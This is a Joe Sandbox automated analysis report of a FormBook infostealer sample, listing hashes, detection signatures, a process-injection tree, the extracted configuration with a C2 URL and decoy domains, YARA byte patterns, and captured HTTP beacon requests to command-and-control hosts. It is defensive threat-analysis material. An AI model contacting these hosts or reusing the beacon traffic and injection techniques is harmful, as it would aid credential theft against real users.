Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4505682666.exe

Overview

General Information

Sample Name:4505682666.exe
Analysis ID:601808
MD5:9746147d84cb3d6b7a91ac76fc7b74b2
SHA1:8c70e93e0c8c29b2be64703485c30be238dee7db
SHA256:6d40fb5818ad031394cb4fa6e0007d69bcdf4396b7f6af749badc7a080c776ae
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • 4505682666.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\4505682666.exe" MD5: 9746147D84CB3D6B7A91AC76FC7B74B2)
    • sfxwkrzgst.exe (PID: 6940 cmdline: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj MD5: 4745AFD382988B0E54FCA3B7C6CC62C6)
      • sfxwkrzgst.exe (PID: 7000 cmdline: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj MD5: 4745AFD382988B0E54FCA3B7C6CC62C6)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • NETSTAT.EXE (PID: 6852 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 6976 cmdline: /c del "C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.stxgvdhndry.mobi/iedi/"], "decoy": ["taschenhimmel.guru", "nychehang.com", "samrgov.xyz", "lumenharleystreet.com", "286241.com", "herramientaspcdigitales.com", "collegesecurityroadshow.com", "fcpt.club", "iphone13promax.art", "karmikdevco.com", "melanin4mermaidstalks.com", "550-29th.com", "bsthuy24h.com", "desertmermaidcreations.com", "fifi8.xyz", "interweavelife.com", "onlylands.icu", "freemanengenharia.com", "referralinstituteatlanta.com", "dugerits.com", "taeksanglee.com", "joycemalaysiaproperty.com", "realautotrade.com", "superstarcoding.com", "exoticcaliweed.com", "civilgraphics.com", "luluxiong.com", "bethmacywriter.com", "industrialohare.com", "sarahkramirez.store", "supertry.online", "paretli.store", "i-collect.art", "mmuhwh.website", "find-me-a-cruise.com", "elysecanoceramics.com", "gpkdc.com", "sandercpa.net", "ricardoramirezvi.com", "ohhhmarketing.com", "siprah.group", "scottsdaletales.net", "xinyue.one", "yayasannurulhudajambi.com", "radoftheday.com", "mygotomaid.com", "withustown.com", "03gjm.xyz", "areta-school.com", "herffchristiansen.com", "jadearray.com", "casamentobiaeval.com", "harmonyineducation.com", "waihekedoctors.com", "malmaten.xyz", "pdqkitchen.com", "techbuzzbusinessgroup.com", "alteribakery.com", "torikawatters.com", "ks-med.store", "xn--22c2bxc0b4e1al.com", "smartlifeblockchain.com", "the-healthyhabits.com", "aoliucncp.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.sfxwkrzgst.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.sfxwkrzgst.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.sfxwkrzgst.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        2.2.sfxwkrzgst.exe.2730000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.sfxwkrzgst.exe.2730000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          There are no malicious signatures, click here to show all signatures.

          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\SysWOW64\NETSTAT.EXE, CommandLine: C:\Windows\SysWOW64\NETSTAT.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\NETSTAT.EXE, NewProcessName: C:\Windows\SysWOW64\NETSTAT.EXE, OriginalFileName: C:\Windows\SysWOW64\NETSTAT.EXE, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3968, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\SysWOW64\NETSTAT.EXE, ProcessId: 6852, ProcessName: NETSTAT.EXE
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\4505682666.exe, ProcessId: 6864, TargetFilename: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe
          Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj, CommandLine: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe, ParentCommandLine: "C:\Users\user\Desktop\4505682666.exe" , ParentImage: C:\Users\user\Desktop\4505682666.exe, ParentProcessId: 6864, ParentProcessName: 4505682666.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj, ProcessId: 6940, ProcessName: sfxwkrzgst.exe

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.stxgvdhndry.mobi/iedi/"], "decoy": ["taschenhimmel.guru", "nychehang.com", "samrgov.xyz", "lumenharleystreet.com", "286241.com", "herramientaspcdigitales.com", "collegesecurityroadshow.com", "fcpt.club", "iphone13promax.art", "karmikdevco.com", "melanin4mermaidstalks.com", "550-29th.com", "bsthuy24h.com", "desertmermaidcreations.com", "fifi8.xyz", "interweavelife.com", "onlylands.icu", "freemanengenharia.com", "referralinstituteatlanta.com", "dugerits.com", "taeksanglee.com", "joycemalaysiaproperty.com", "realautotrade.com", "superstarcoding.com", "exoticcaliweed.com", "civilgraphics.com", "luluxiong.com", "bethmacywriter.com", "industrialohare.com", "sarahkramirez.store", "supertry.online", "paretli.store", "i-collect.art", "mmuhwh.website", "find-me-a-cruise.com", "elysecanoceramics.com", "gpkdc.com", "sandercpa.net", "ricardoramirezvi.com", "ohhhmarketing.com", "siprah.group", "scottsdaletales.net", "xinyue.one", "yayasannurulhudajambi.com", "radoftheday.com", "mygotomaid.com", "withustown.com", "03gjm.xyz", "areta-school.com", "herffchristiansen.com", "jadearray.com", "casamentobiaeval.com", "harmonyineducation.com", "waihekedoctors.com", "malmaten.xyz", "pdqkitchen.com", "techbuzzbusinessgroup.com", "alteribakery.com", "torikawatters.com", "ks-med.store", "xn--22c2bxc0b4e1al.com", "smartlifeblockchain.com", "the-healthyhabits.com", "aoliucncp.com"]}
          Multi AV Scanner detection for submitted file
          Source: 4505682666.exeVirustotal: Detection: 42%Perma Link
          Source: 4505682666.exeReversingLabs: Detection: 52%
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.stxgvdhndry.mobi/iedi/Avira URL Cloud: Label: malware
          Source: http://www.sarahkramirez.store/iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQAvira URL Cloud: Label: malware
          Source: http://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UAAvira URL Cloud: Label: phishing
          Source: http://www.taeksanglee.com/iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQAvira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: 4505682666.exeJoe Sandbox ML: detected
          Source: 4.0.sfxwkrzgst.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.sfxwkrzgst.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.sfxwkrzgst.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.sfxwkrzgst.exe.2730000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.sfxwkrzgst.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4505682666.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 4505682666.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: sfxwkrzgst.exe, 00000004.00000002.335855686.0000000001270000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: sfxwkrzgst.exe, 00000004.00000002.335855686.0000000001270000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: sfxwkrzgst.exe, 00000002.00000003.252451378.0000000002910000.00000004.00001000.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000002.00000003.251040803.0000000002780000.00000004.00001000.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.336274086.000000000139F000.00000040.00000800.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: sfxwkrzgst.exe, sfxwkrzgst.exe, 00000004.00000002.336274086.000000000139F000.00000040.00000800.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4x nop then pop ebx4_2_00406AB4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx15_2_00426AB5

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.60.208 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sarahkramirez.store
          Source: C:\Windows\explorer.exeDomain query: www.taeksanglee.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.32.156 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.stxgvdhndry.mobi
          Source: C:\Windows\explorer.exeDomain query: www.malmaten.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.248.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.03gjm.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.250 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.supertry.online
          Source: C:\Windows\explorer.exeDomain query: www.ohhhmarketing.com
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.malmaten.xyz
          Source: C:\Windows\explorer.exeDNS query: www.03gjm.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.stxgvdhndry.mobi/iedi/
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ HTTP/1.1Host: www.sarahkramirez.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA HTTP/1.1Host: www.03gjm.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQ HTTP/1.1Host: www.taeksanglee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 203.170.80.250 203.170.80.250
          Source: Joe Sandbox ViewIP Address: 203.170.80.250 203.170.80.250
          Source: 4505682666.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: NETSTAT.EXE, 0000000F.00000002.513921900.00000000032E2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1
          Source: unknownDNS traffic detected: queries for: www.stxgvdhndry.mobi
          Source: global trafficHTTP traffic detected: GET /iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ HTTP/1.1Host: www.sarahkramirez.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA HTTP/1.1Host: www.03gjm.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQ HTTP/1.1Host: www.taeksanglee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
